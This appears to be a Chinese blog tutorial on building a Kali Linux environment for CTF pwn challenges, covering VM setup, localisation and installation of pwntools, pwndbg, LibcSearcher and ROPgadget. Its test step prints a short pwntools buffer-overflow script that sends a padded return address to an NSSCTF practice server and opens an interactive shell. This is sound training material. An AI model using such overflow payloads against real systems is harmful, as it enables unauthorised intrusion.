当前位置:   article > 正文

CTF-PWN环境搭建手册_libcsearcher安装

libcsearcher安装

         工欲善其事必先利其器,作为一名CTF的pwn手,一定要有自己的专用解题环境。本文将详细记录kali下的pwn解题环境的安装过程,B站也会配备配套视频。

目录

安装前的准备工作

虚拟机环境​编辑

VM版本安装教程

1. 下载Kali的VM虚拟机文件

2. 新建一个空白文件夹

3. 解压压缩包

4.打开VMware WorkStation

​编辑 5. 配置虚拟机的硬件

6.启动虚拟机

7.kali汉化步骤

​编辑

8.换源!

 9.中文输入法安装

pwn环境安装

1.pwntools安装

 1、安装指令

2、测试checksec

3、测试pwntools

2.gdb动态调试安装

1、原生gdb安装

 2、pwndbg安装

 3、测试安装

​编辑

3.LibcSearcher安装

4.ROPGadget安装


安装前的准备工作

虚拟机环境

VMware WorkStation

VM版本安装教程

1. 下载Kali的VM虚拟机文件

Kali的VM虚拟机文件

Kali的VM虚拟机文件可在Kali官网下载

kali官网
Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution

 左侧Installer Images为光盘镜像文件,右侧Vitrual Machines是我们这次下载的VM虚拟机文件

 点击这里下载

 最后得到压缩包

2. 新建一个空白文件夹

找一个空间大点的盘,新建这个文件夹,命名就叫Kali好了

3. 解压压缩包

把第一步下载的VM虚拟机文件,解压到当前目录下

对着文件右键解压文件,选中你创建的文件夹。

 

 等待解压完成

解压完成会得到

4.打开VMware WorkStation

点击打开虚拟机

 选中文件中的这个

 5. 配置虚拟机的硬件

打开虚拟机之前,需要调整硬件设置

 点击编辑虚拟机设置

 内存设置,电脑本机的内存的一半即可。

处理器1就行。核取一半(up的CPU只有8核)

硬盘其实60G就完全够用

配置完成记得点击确认保存

6.启动虚拟机

由于这个是配置好的,所以默认密码是kali/kali

 登录之后的样子,全英文有点难受

7.kali汉化步骤

全英文怎么玩!!!给我汉化

右键Kali的桌面,点击Open Terminal Here(在此处打开控制台)

 输入指令

一、进入root模式

sudo -i   #指令输入后,会要求输入kali的密码,也就是kali。注意,kali输密码光标是不会动的哦!

 

 已经入root模式就是红红的

二、更新源(不是换源!)

apt-get update

看到这烦人的下载速度没,这就提醒你该换源(下载服务器)了 ,CTRL+C结束,然后先去第8步换源吧

 

三、设置系统语言

sudo dpkg-reconfigure locales

下方向键一直按着

按到看到zh_CN

选中了之后,不要按回车!!!!!!

先按空格!!!!变成星星,我已踩坑

回车,如果没有zh_cn,证明没听我话,退回去重新操作就行

回车,接下里让它自己跑

重启系统应用汉化

reboot

这个不建议改成汉化的,因为经常要访问 ,英文路径好打

8.换源!

我看这篇写的挺好,那我就偷懒了,记得阿里和清华一起上
Kali 更换源(超详细,附国内优质镜像源地址)_kali换源-CSDN博客

 9.中文输入法安装

1.打开终端,输入以下命令:root权限哦

apt-get install ibus ibus-pinyin  

记得点Y

reboot #重启

右上角切换

pwn环境安装

1.pwntools安装

 1、安装指令

进入root

sudo -i

安装指令 

sudo pip3 install pwntools

2、测试checksec

测试题目位置
NSSCTF | 在线CTF平台

把附件拖到kali中,重命名为pwn1,方便写指令。指令要在桌面路径执行哦。

checksec pwn1

3、测试pwntools

  1. from pwn import *
  2. xianyufen=remote("node1.anna.nssctf.cn",28029)#按照服务器地址和端口更改
  3. payload=b'a'*0x2C+p64(0x41348000)
  4. xianyufen.send(payload)
  5. xianyufen.interactive()

我的是这样的

  1. from pwn import *
  2. xianyufen=remote("node4.anna.nssctf.cn",28492)#按照服务器地址和端口更改
  3. payload=b'a'*0x2C+p64(0x41348000)
  4. xianyufen.send(payload)
  5. xianyufen.interactive()

在桌面用指令建一个python脚本

vim attack.py 

然后就可以右键编辑了,用Mousepad打开

指令粘贴进去

控制台运行一下

python3 attack.py

再输个ls,即可看到flag,工具已正常安装

2.gdb动态调试安装

1、原生gdb安装

sudo apt install gdb

 2、pwndbg安装

访问github,获取安装指令
GitHub - pwndbg/pwndbg: Exploit Development and Reverse Engineering with GDB Made Easy

 安装指令

  1. # 下载仓库
  2. git clone https://github.com/pwndbg/pwndbg

会得到pwndbg项目文件夹 

  1. # 移动到文件夹下
  2. cd pwndbg
  3. # 可以用ls看一下当前目录下的文件

  1. # 启动安装脚本
  2. ./setup.sh

安装时间会有点久

 

 3、测试安装

cd ../ #回到桌面
gdb pwn1   #上一节的栈文件,拿来测试

 显示的是pwndbg就对了,打个断点玩一下

b main  #main函数打个断点

quit  #退出

温馨提示:pwndbg那个文件夹别删除!

3.LibcSearcher安装

旧版LibcSearcher 安装发现报错   GitHub - lieanu/LibcSearcher: glibc offset search for ctf.

更换别的版本

项目地址如下:https://github.com/dev2ero/LibcSearcher

yH5BAAAAAAALAAAAAAOAA4AAAIMhI+py+0Po5y02qsKADs=

wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==

安装指令

pip3 install LibcSearcher

代替在线工具 

4.ROPGadget安装

sudo pip install capstone

正常应该是successfully,但我这里好像在前面已经装好了 

 载项目

git clone https://github.com/JonathanSalwan/ROPgadget.git

移动至项目文件夹下

cd ROPgadget

 

安装指令

sudo python3 setup.py install

声明:本文内容由网友自发贡献,转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
  

闽ICP备14008679号